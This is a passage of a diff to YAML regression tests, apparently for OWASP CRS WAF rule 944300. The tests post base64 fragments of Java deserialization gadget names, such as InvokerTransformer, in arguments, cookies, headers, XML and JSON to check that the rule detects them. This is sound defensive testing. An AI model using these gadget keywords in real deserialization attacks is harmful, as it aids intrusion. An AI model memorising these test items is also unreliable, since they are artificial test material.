"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + 
output: + log: + expect_ids: [944300] + - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - 
output: - log_contains: "id \"944300\"" - - test_title: 944300-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - 
test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-194 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - 
test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log: + expect_ids: [944300] + - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 202 desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 203 desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW52b2tlcnRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 204 desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - 
